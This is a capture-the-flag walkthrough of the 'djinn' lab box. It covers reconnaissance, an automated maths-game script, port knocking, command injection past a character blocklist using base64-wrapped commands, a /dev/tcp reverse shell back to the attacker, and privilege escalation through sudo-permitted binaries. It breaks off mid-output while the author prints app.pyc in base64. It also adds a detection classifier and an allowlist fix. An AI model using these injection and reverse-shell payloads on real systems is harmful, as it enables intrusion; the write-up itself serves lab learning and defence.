The goal is to capture user.txt and root.txt.
After downloading the VM, open it in VMware. Before powering it on, set its network adapter to NAT so that it sits on the same segment as the Kali attacking machine.
Scan with nmap:
└─# nmap -p- -A -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST
Nmap scan report for 192.168.5.130
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.5.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   filtered ssh
1337/tcp open     waste?
| fingerprint-strings:
|   NULL:
|     ____ _____ _
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '*', 4)
|   RPCCheck:
|     ____ _____ _
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '+', 9)
7331/tcp open     http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.91%I=7%D=9/10%Time=613ABC9D%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\
SF:x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20
SF:__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x
SF:20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\
SF:x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths
SF:\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20
SF:you\x20your\x20gift\.\n\(3,\x20'\*',\x204\)\n>\x20")%r(RPCCheck,1BC,"\x
SF:20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\
SF:x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\
SF:x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\
SF:x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\
SF:___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x
SF:20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x
SF:20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20you
SF:r\x20gift\.\n\(3,\x20'\+',\x209\)\n>\x20");
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms 192.168.5.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.43 seconds
Port 21 is open and allows anonymous login as the user ftp. Port 22 (SSH) is filtered. The banner on port 1337 shows a game that hands out a gift after 1000 correct answers. Port 7331 is an HTTP service, reached by browsing to IP:7331.
After logging in anonymously, download the three files in the directory:
└─# ftp 192.168.5.130
Connected to 192.168.5.130.
220 (vsFTPd 3.0.3)
Name (192.168.5.130:root): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
-rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (3.9378 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.01 secs (9.0051 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (707.3818 kB/s)
ftp> exit
221 Goodbye.
View the contents:
└─# ls
creds.txt CVE-2018-7600 game.txt message.txt
└─# cat creds.txt
nitu:81299
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
This yields one credential: nitu:81299
Since port 22 is filtered, test port 1337 first:
└─# telnet 192.168.5.130 1337
Trying 192.168.5.130...
Connected to 192.168.5.130.
Escape character is '^]'.
  ____                        _____ _
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|


Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '*', 7)
> 42
(3, '*', 3)
> 9
(9, '/', 1)
> 2
Wrong answer
Connection closed by foreign host.
A correct answer lets the game continue; a wrong answer ends the connection immediately.
So write a script to play the 1000 rounds:
# coding:utf-8
# Play the maths game on port 1337 automatically: read each "(a, 'op', b)"
# question, evaluate it and send the answer back, 1001 times in a row.
import logging
import re
import telnetlib  # deprecated since Python 3.11 and removed in 3.13
import time


def main():
    try:
        tn = telnetlib.Telnet('192.168.5.130', port=1337, timeout=5)
    except OSError as exc:
        logging.warning("connection failed: %s", exc)
        return None
    loop = 1
    while loop < 1002:
        try:
            # block until the "> " prompt arrives instead of racing it with sleep()
            data = tn.read_until(b"> ", timeout=5).decode('ascii')
        except EOFError:
            break  # the server closed the connection (wrong answer)
        print(data)
        match = re.search(r'(\(.*?\))\s*>', data)
        if match is None:
            return data  # no question in this chunk: the gift or an error message
        datas = str(calc(match.group(1))).strip()
        print(str(loop) + ":" + datas)
        loop = loop + 1
        tn.write(datas.encode('ascii') + b"\n")
    time.sleep(0.5)
    # whatever the server sends after the last answer is the gift line
    data = tn.read_very_eager().decode('ascii')
    return data


def calc(res):
    # turn "(6, '*', 7)" into the expression 6*7 and evaluate it;
    # the input comes straight from the game server, which is the only
    # reason eval() is tolerable here
    res_str = res.strip('(').strip(')').replace("'", "")
    muns = res_str.split(',')
    number1 = muns[0].strip()
    operator = muns[1].strip()
    number2 = muns[2].strip()
    return eval(number1 + operator + number2)


print(main())
This yields the gift: 1356, 6784, 3409
> 997:1.4
(2, '+', 2)
> 998:4
(3, '+', 6)
> 999:9
(4, '*', 9)
> 1000:36
(7, '/', 7)
> 1001:1.0
Here is your gift, I hope you know what to do with it: 1356, 6784, 3409
The three numbers are a port-knocking sequence, so knock them in order with the knock client:
knock 192.168.5.130 1356 6784 3409
Then scan again with nmap:
└─# nmap -p- -A -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 11:11 CST
Nmap scan report for 192.168.5.130
Host is up (0.00076s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.5.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b8:cb:14:15:05:a0:24:43:d5:8e:6d:bd:97:c0:63:e9 (RSA)
|   256 d5:70:dd:81:62:e4:fe:94:1b:65:bf:77:3a:e1:81:26 (ECDSA)
|_  256 6a:2a:ba:9c:ba:b2:2e:19:9f:5c:1c:87:74:0a:25:f0 (ED25519)
1337/tcp open  waste?
| fingerprint-strings:
|   NULL:
|     ____ _____ _
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '/', 6)
|   RPCCheck:
|     ____ _____ _
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '+', 8)
7331/tcp open  http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.91%I=7%D=9/10%Time=613ACCE4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\
SF:x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20
SF:__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x
SF:20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\
SF:x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths
SF:\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20
SF:you\x20your\x20gift\.\n\(9,\x20'/',\x206\)\n>\x20")%r(RPCCheck,1BC,"\x2
SF:0\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x
SF:20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x
SF:20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x2
SF:0\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20
SF:\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\_
SF:__\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x2
SF:0see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x2
SF:0my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20your
SF:\x20gift\.\n\(7,\x20'\+',\x208\)\n>\x20");
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 192.168.5.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds
Port 22 is now open.
Since 7331 is an HTTP service, run a directory scan against it:
└─# dirsearch -u "http://192.168.5.130:7331/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520

Output File: /root/.dirsearch/reports/192.168.5.130/_21-09-10_11-17-08.txt

Error Log: /root/.dirsearch/logs/errors-21-09-10_11-17-08.log

Target: http://192.168.5.130:7331/

[11:17:08] Starting:
[11:17:31] 200 -  385B  - /wish
[11:18:09] 200 -    2KB - /genie

Task Completed
Browse to it. The page claims it can grant any wish, so try entering whoami.
The result shows up in the URL of the page we are redirected to, which means there is a command-execution vulnerability here.
Trying to read the credentials file is blocked, so use Burp to test every special character. The following characters are rejected:
; / ? * ^ $
So try a base64 bypass.
On the local Kali box:
└─# echo "cat /etc/passwd"|base64
Y2F0IC9ldGMvcGFzc3dkCg==
In Burp:
echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash
cat /etc/passwd executes successfully.
Start a listener locally:
nc -lvnp 9000
On Kali, encode the reverse-shell command:
└─# echo "bash -i &> /dev/tcp/192.168.5.129/9000 0>&1"|base64
YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo=
Then submit it in Burp:
echo "YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo="|base64 -d|bash
We get a shell:
└─# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.5.129] from (UNKNOWN) [192.168.5.130] 42968
bash: cannot set terminal process group (730): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ whoami
whoami
www-data
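From the defender's side, the notable thing about the two wishes above is that the filter on the wish form only ever saw the echo ... | base64 -d | bash wrapper, never the command inside it. The block below is an added example, not code from the box or from this write-up: a small classifier (rule names and patterns are my own) that applies detection rules to a wish, then decodes any base64 blob embedded in it and applies the same rules to the decoded text, using the two payloads from this write-up plus a harmless wish as constructed sample input.

```python
import base64
import binascii
import re

# Detection rules a reviewer might put in front of a wish-granting endpoint
# such as this box's /wish. Rule names and patterns are my own, not the box's.
RULES = [
    ("decode-to-shell", re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")),
    ("interactive-shell", re.compile(r"\bbash\s+-i\b")),
    ("dev-tcp-reverse-shell", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("sensitive-file", re.compile(r"/etc/(?:passwd|shadow)\b")),
]

# Anything that looks like a base64 run long enough to hide a command
BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def classify(cmd, depth=2):
    """Return the sorted rule names matched by cmd or by any base64 blob
    embedded in it, decoding up to `depth` nested layers.

    A character blocklist only sees the outer wrapper; decoding the blob is
    what exposes the command that will actually run.
    """
    hits = {name for name, rx in RULES if rx.search(cmd)}
    if depth > 0:
        for blob in BLOB.findall(cmd):
            try:
                inner = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not really base64, or not text: nothing to inspect
            hits.update(classify(inner, depth - 1))
    return sorted(hits)


# Constructed sample: the two wishes from this write-up plus a harmless one
SAMPLE_WISHES = [
    "whoami",
    'echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash',
    'echo "YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo="|base64 -d|bash',
]


def scan_wishes(wishes=SAMPLE_WISHES):
    """Map each wish to its rule hits; an empty list means nothing suspicious."""
    return {wish: classify(wish) for wish in wishes}


if __name__ == "__main__":
    for wish, hits in scan_wishes().items():
        print("%-60s %s" % (wish[:60], hits or "clean"))
```

The recursion matters more than any single pattern: the outer wish trips only the decode-to-shell rule, while the reverse-shell and /etc/passwd rules fire on the decoded layer, which is the layer the box's filter never examined.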
Upgrade to a Python pty shell; without a proper tty, su refuses to switch users:
www-data@djinn:/opt/80$ su root
su root
su: must be run from a terminal
python3 -c 'import pty;pty.spawn("/bin/bash")'
Several files sit in the current directory; view them with cat:
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess

from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False


@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")


@app.route("/wish", methods=['POST', "GET"])
def wish():
    execute = request.form.get("cmd")
    if execute:
        if validate(execute):
            output = subprocess.Popen(execute, shell=True, stdout=subprocess.PIPE).stdout.read()
        else:
            output = "Wrong choice of words"
        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')


@app.route('/genie', methods=['GET', 'POST'])
def genie():
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = "It's not that hard"
    return render_template('genie.html', file=page)


if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
The filtering happens here: RCE is the blocklist, and validate() checks it against the wish one character at a time before the wish is handed to a shell.
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]

def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False
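The lesson for whoever maintains an app like this is that a character blocklist cannot make shell=True safe. The block below is an added example, not code from the box: it reproduces the page's validate() next to an allowlist version of my own design (with a constructed "hello" wish) that maps a wish name to a fixed argv list and runs it without a shell. Under the allowlist the base64 wrapper from this write-up is rejected outright, and the "eval" entry, which the original compares against single characters and therefore never matches, is no longer needed.

```python
import subprocess

# Copied from the box's app.py so the weak check can be compared with a fix
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    """The box's original check, reproduced: a per-character blocklist."""
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:  # j is one character, so the entry "eval" can never match
                if i == j:
                    return False
        return True
    except Exception:
        return False


# Hardened replacement (my design, not the box's code): a wish is only a key
# into a fixed table of argv lists, so nothing the user typed reaches a shell
WISHES = {
    "whoami": ["whoami"],
    "hello": ["echo", "hello from the lamp"],  # constructed sample wish
}


def validate_allowlist(cmd):
    """Accept only the exact name of a pre-approved wish."""
    return cmd.strip() in WISHES


def run_wish(cmd):
    """Run an approved wish without shell=True; return None for anything else."""
    if not validate_allowlist(cmd):
        return None
    argv = WISHES[cmd.strip()]
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


def compare(cmd):
    """Show what each check decides for one wish."""
    return {"blocklist": validate(cmd), "allowlist": validate_allowlist(cmd)}


if __name__ == "__main__":
    for sample in ["whoami", "cat /etc/passwd", "eval",
                   'echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash']:
        print("%-50r %s" % (sample, compare(sample)))
```

The allowlist loses the "grant any wish" feature, which is the point: a wish the server did not pre-approve is a wish it should not be running.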
CREDS is a path string, so use find to locate files with that name:
www-data@djinn:/opt/80$ find / -name *creds* -print 2>&1| grep -v "Permission denied"
<me *creds* -print 2>&1| grep -v "Permission denied"
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
Two hits:
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
/srv/ftp/creds.txt is the file downloaded from FTP earlier, containing nitu:81299.
Read /home/nitish/.dev/creds.txt with cat; it contains:
www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
This gives nitish's password: nitish:p4ssw0rdStr3r0n9
Switch to nitish with su and collect the first flag, user.txt:
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:/opt/80$
nitish@djinn:/opt/80$ cat /home/nitish/user.txt
cat /home/nitish/user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
Check sudo permissions:
nitish@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
The genie command can be run as sam, and no password is required.
nitish@djinn:/opt/80$ genie -h
genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish

I know you've came to me bearing wishes in mind. So go ahead make your wishes.

positional arguments:
  wish                  Enter your wish

optional arguments:
  -h, --help            show this help message and exit
  -g, --god             pass the wish to god
  -p SHELL, --shell SHELL
                        Gives you shell
  -e EXEC, --exec EXEC  execute command
After trying them, none of these options is usable, so look at the man page:
nitish@djinn:/opt/80$ man genie
man genie
WARNING: terminal is not fully functional -  (press RETURN)
man(8)                          genie man page                          man(8)

NAME
       genie - Make a wish

SYNOPSIS
       genie [-h] [-g] [-p SHELL] [-e EXEC] wish

DESCRIPTION
       genie would complete all your wishes, even the naughty ones. We all dream of getting those crazy privelege escalations, this will even help you acheive that.

OPTIONS
       wish   This is the wish you want to make .

       -g, --god
              Sometime we all would like to make a wish to god, this option let you make wish directly to God; Though genie can't gurantee you that your wish will be heard by God, he's a busy man you know;

       -p, --shell
              Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"

       -e, --exec
              Execute command on someone else computer is just too damn fun, but this comes with some restrictions.

       -cmd   You know sometime all you new is a damn CMD, windows I love you.

SEE ALSO
       mzfr.github.io

BUGS
       There are shit loads of bug in this program, it's all about finding one.
 Manual page genie(8) line 25 (press h for help or q to quit)
The man page lists an option, -cmd, that the -h usage did not show.
Try genie -cmd id. It runs normally, and on exit it prints the taunting "You are a noob hacker!!":
nitish@djinn:/opt/80$ genie -cmd id
genie -cmd id
my man!!
$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
$ exit
exit
You are a noob hacker!!
Run it as sam through sudo; the id output confirms we are now sam:
nitish@djinn:/opt/80$ sudo -u sam genie -cmd id
sudo -u sam genie -cmd id
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
Check sudo permissions again:
sam@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
The lago command can be run as root, and no password is required:
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:
After trying each option, nothing here looks exploitable:
sam@dj
inn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!!
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: 52
52
Better Luck next time
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
3
Enter the full of the file to read: /etc/passwd
/etc/passwd
User root is not allowed to read /etc/passwd
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
Transfer the file with base64: run base64 app.pyc on the target, then copy the encoded output to the local box and decode it to recover the original file.
sam@djinn:/opt/80$ base64 app.pyc
base64 app.pyc
A/MNCgYZzF1jAAAAAAAAAAAIAAAAQAAAAHMIAQAAZAAAZAEAbAAAWgAAZAAAZAIAbAEAbQIAWgIA
bQMAWgMAbQQAWgQAbQUAWgUAbQYAWgYAAWUCAGUHAIMBAFoIAGQDAGUIAF8JAGQEAFoKAGQFAGQG
